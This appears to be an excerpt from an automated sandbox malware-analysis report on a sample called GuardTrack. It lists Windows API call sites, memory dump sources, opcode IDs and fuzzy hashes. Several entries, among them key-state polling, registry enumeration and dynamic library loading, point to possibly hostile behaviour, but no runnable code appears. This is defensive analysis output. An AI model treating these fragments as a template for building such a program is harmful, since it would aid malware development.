                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0060AC73
                                                          • EnumChildWindows.USER32(?,0060ACEB), ref: 0060AC9B
                                                          • __swprintf.LIBCMT ref: 0060ACB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                          • String ID: %s%d
                                                          • API String ID: 1941087503-1110647743
                                                          • Opcode ID: b89c591d744ac22a46607edd5ff3b2e452f536d216090016b8d4cfc30788a378
                                                          • Instruction ID: 63b9c3101a0cefcabc95ad9301db0c54a846608191eb85a771bcc9f55cea8eeb
                                                          • Opcode Fuzzy Hash: b89c591d744ac22a46607edd5ff3b2e452f536d216090016b8d4cfc30788a378
                                                          • Instruction Fuzzy Hash: A811D275280305ABEF55BFE0CD86FEA376EAB85300F004079FE08AA1C2DA705945DB75
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00612318
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 3964851224-769500911
                                                          • Opcode ID: 724b7f247182f2803529c2c9493630aea5e155bbce104ed56005a5c7780f7422
                                                          • Instruction ID: 943643e875a169fadf99b988586b4ec1e59d5f2b242e382190d6bb401417e328
                                                          • Opcode Fuzzy Hash: 724b7f247182f2803529c2c9493630aea5e155bbce104ed56005a5c7780f7422
                                                          • Instruction Fuzzy Hash: 2D11703090011ADFCF00EF94C9A05EDBBB6FF56304F10506AD81097392DB325E56CB40
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0062F2F0
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0062F320
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0062F453
                                                          • CloseHandle.KERNEL32(?), ref: 0062F4D4
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: 65ed32e2b6fe4f299bb3230b91e3f1f7aef4fd1ceb23c4b09553873517a4c00e
                                                          • Instruction ID: 28372512dbe3abc8ad341099fa3597855f514c77d4eb2e1a93984591f9bf0ab1
                                                          • Opcode Fuzzy Hash: 65ed32e2b6fe4f299bb3230b91e3f1f7aef4fd1ceb23c4b09553873517a4c00e
                                                          • Instruction Fuzzy Hash: 168180756007119FD724EF28D846B6ABBE6BF84710F14882DF9999B393D7B0AC408F91
                                                          APIs
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                            • Part of subcall function 0063147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0063040D,?,?), ref: 00631491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0063075D
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0063079C
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006307E3
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 0063080F
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0063081C
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          • Opcode ID: 873c2d6bfed0f223adf3b3f6c87f65f73c5be9d4350d7028ce2adcb1d706d0e5
                                                          • Instruction ID: 6fdb49d77d6d6070ba32ee59dfe9c46e7184ecbe82929b9b2fd0a9c597177ece
                                                          • Opcode Fuzzy Hash: 873c2d6bfed0f223adf3b3f6c87f65f73c5be9d4350d7028ce2adcb1d706d0e5
                                                          • Instruction Fuzzy Hash: D4517C31208205AFD714EF64C895F6ABBFAFF85704F04491DF595872A2DB31E909CB92
                                                          APIs
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0062E010
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0062E093
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0062E0AF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0062E0F0
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0062E10A
                                                            • Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00617E51,?,?,00000000), ref: 005C4041
                                                            • Part of subcall function 005C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00617E51,?,?,00000000,?,?), ref: 005C4065
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 327935632-0
                                                          • Opcode ID: f41f7fc3f25a56070e11ddc9906581e955de4b664fa14cd0a724a1a2ce690df7
                                                          • Instruction ID: 10bf082d29deb278fb7a3123889c903b442c70c59633469b116ed61997c1de7b
                                                          • Opcode Fuzzy Hash: f41f7fc3f25a56070e11ddc9906581e955de4b664fa14cd0a724a1a2ce690df7
                                                          • Instruction Fuzzy Hash: 93517B34A0061ADFCB10EFA8D488D9DBBF5FF49310B048069E905AB352D731AD56CF91
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0061EC62
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0061EC8B
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0061ECCA
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0061ECEF
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0061ECF7
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: e10198f0739141acfbde614c22a7a2b84fff79b01408988ece7b6755dd1f2e6b
                                                          • Instruction ID: e56b3b162b165f7036fa057335a4c25ef294668cefa3d130c2b69b43499fcd93
                                                          • Opcode Fuzzy Hash: e10198f0739141acfbde614c22a7a2b84fff79b01408988ece7b6755dd1f2e6b
                                                          • Instruction Fuzzy Hash: 19514E35A00506DFDB11EF64C985AAEBBF5FF49310B188099E849AB3A2CB31ED51CF50
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12754e03c020d723a04fa669b49ff53d1d139161c253229a783ed466647a4fd0
                                                          • Instruction ID: 8b1dc8ce14b6cb1841ce8f34efb1f737a9cde807b8c8884b8ad10750b1d76bc9
                                                          • Opcode Fuzzy Hash: 12754e03c020d723a04fa669b49ff53d1d139161c253229a783ed466647a4fd0
                                                          • Instruction Fuzzy Hash: BA41F339900114AFD714CFA8CCC8FE9BBB7EB0A350F140265E99AA73D1C630AD41EAD1
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 005B2727
                                                          • ScreenToClient.USER32(006777B0,?), ref: 005B2744
                                                          • GetAsyncKeyState.USER32(00000001), ref: 005B2769
                                                          • GetAsyncKeyState.USER32(00000002), ref: 005B2777
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: a9173b5127e241a7d0353e618f7e8388e7bd164797930b064aeb02c8fe90e879
                                                          • Instruction ID: 1ce0ab4cdae34a2da3cc69a59e8bc7bc07566066d01ba09459bd57fd38800159
                                                          • Opcode Fuzzy Hash: a9173b5127e241a7d0353e618f7e8388e7bd164797930b064aeb02c8fe90e879
                                                          • Instruction Fuzzy Hash: AE41B335504119FFDF199F69C848AEDBF75FB0A324F10835AF868962A0CB30AD51DBA4
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B52E6
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005B534A
                                                          • TranslateMessage.USER32(?), ref: 005B5356
                                                          • DispatchMessageW.USER32(?), ref: 005B5360
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchTranslate
                                                          • String ID:
                                                          • API String ID: 1795658109-0
                                                          • Opcode ID: 17d0e20f57937709ac257be1e67ddeee084b8596603491269ca2f3ba920390b8
                                                          • Instruction ID: 5459e45de29dd56248be04c046b071432079b150ba077d6803619f1b324fd454
                                                          • Opcode Fuzzy Hash: 17d0e20f57937709ac257be1e67ddeee084b8596603491269ca2f3ba920390b8
                                                          • Instruction Fuzzy Hash: F2310130508B469AEB3CCF64DC44BE97FF9BB01340F24186AE576862E1E2B1B885D721
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 006095E8
                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00609692
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0060969A
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 006096A8
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 006096B0
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: 9dcf3e5e876d4327a05ee15432e167270607cd91d80aea2695c37de685723df9
                                                          • Instruction ID: 89399f28d7916205e5d0203e1b6f02a8d850f68f23bf1a0acbe5d8ea44bf0f5f
                                                          • Opcode Fuzzy Hash: 9dcf3e5e876d4327a05ee15432e167270607cd91d80aea2695c37de685723df9
                                                          • Instruction Fuzzy Hash: BB31BC71900219EBEB18CFA8D94CADE7BB7EB45315F104219F925AB2D1C3B19924DBA0
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0060BD9D
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0060BDBA
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0060BDF2
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0060BE18
                                                          • _wcsstr.LIBCMT ref: 0060BE22
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                          • String ID:
                                                          • API String ID: 3902887630-0
                                                          • Opcode ID: 9be52e588e2c1288fcf5fd766842c7fffc589ed4de19643f43036cf979ae2fb0
                                                          • Instruction ID: 0ba36e28a5cf3e1d5efc1f82e1499a2b97571a9413546164c3c5350dcf7bf4df
                                                          • Opcode Fuzzy Hash: 9be52e588e2c1288fcf5fd766842c7fffc589ed4de19643f43036cf979ae2fb0
                                                          • Instruction Fuzzy Hash: 6D21F832244205BBFB295B39DC09EBB7F9EDF85750F10902AF909DA2D1DB61CC409260
                                                          APIs
                                                            • Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0063B804
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0063B829
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0063B841
                                                          • GetSystemMetrics.USER32(00000004), ref: 0063B86A
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0062155C,00000000), ref: 0063B888
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: 2e5b37187a96d28db720c40dc9a3b01c5460424c0898a4378fd30c0cb4d92a21
                                                          • Instruction ID: 40d9f426dba6e0011a6736644f1e920837fae036a9955bb7e2a310930ff4eb88
                                                          • Opcode Fuzzy Hash: 2e5b37187a96d28db720c40dc9a3b01c5460424c0898a4378fd30c0cb4d92a21
                                                          • Instruction Fuzzy Hash: 8421A331A14225AFCB149F38CC08BAA3BAAFB45320F106738FA25D72E0D7309951CBD0
                                                          APIs
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00609ED8
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00609F0A
                                                          • __itow.LIBCMT ref: 00609F22
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00609F4A
                                                          • __itow.LIBCMT ref: 00609F5B
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow$_memmove
                                                          • String ID:
                                                          • API String ID: 2983881199-0
                                                          • Opcode ID: a42368216f9d5e94eecf3d0015c02bd3cd54e2eda427a2573099016293e37598
                                                          • Instruction ID: a83594875dd44a70252c8fac0a69101f2bdf24801f883ff870662535ba883464
                                                          • Opcode Fuzzy Hash: a42368216f9d5e94eecf3d0015c02bd3cd54e2eda427a2573099016293e37598
                                                          • Instruction Fuzzy Hash: 8E21B8316412167FDB149AA58C49EEF7BABEB86750F044015F905D7282D670C94197E1
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 00626159
                                                          • GetForegroundWindow.USER32 ref: 00626170
                                                          • GetDC.USER32(00000000), ref: 006261AC
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 006261B8
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 006261F3
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: 74175ab859d89ae1e5361e4b5c1c523aa8a3a33965e1e19b02f93da32e1045ad
                                                          • Instruction ID: 2d81aabb22f252f07c0caa9e167ca775c73864d1a6c25e92cd9c7b565d1b76ff
                                                          • Opcode Fuzzy Hash: 74175ab859d89ae1e5361e4b5c1c523aa8a3a33965e1e19b02f93da32e1045ad
                                                          • Instruction Fuzzy Hash: DB21A475A00614AFD714EF69DC88A9ABBF6EF89310F04846DF94A97352CB30BC40CB90
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005B1729
                                                          • SelectObject.GDI32(?,00000000), ref: 005B1738
                                                          • BeginPath.GDI32(?), ref: 005B174F
                                                          • SelectObject.GDI32(?,00000000), ref: 005B1778
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 13feb9896e80ef71e3dd128d59046734e6f24e1536decbc9e6cf9bb955b63263
                                                          • Instruction ID: 53751007796286e4fab8cb9133d16c22ba45c60baa66781ba67311522f401512
                                                          • Opcode Fuzzy Hash: 13feb9896e80ef71e3dd128d59046734e6f24e1536decbc9e6cf9bb955b63263
                                                          • Instruction Fuzzy Hash: 2A21C130914608EBEB148FA4DC08BA93FAAFB01311F144235F819931A0EB70A991CBD6
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 5e4de66e4ce22636b522d5fdf4dcf67420a5c34d222d0642a5d22f0df11fcb00
                                                          • Instruction ID: adc7f40c49ceb4f89005f881d5660cb84cdf1923b40033e447b8feeda4e1ad6d
                                                          • Opcode Fuzzy Hash: 5e4de66e4ce22636b522d5fdf4dcf67420a5c34d222d0642a5d22f0df11fcb00
                                                          • Instruction Fuzzy Hash: 5A01F9626805153BD21C63145E86FF77B5EEA60365F04C226FD0696782F760DE11C2E8
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00615075
                                                          • __beginthreadex.LIBCMT ref: 00615093
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 006150A8
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006150BE
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006150C5
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
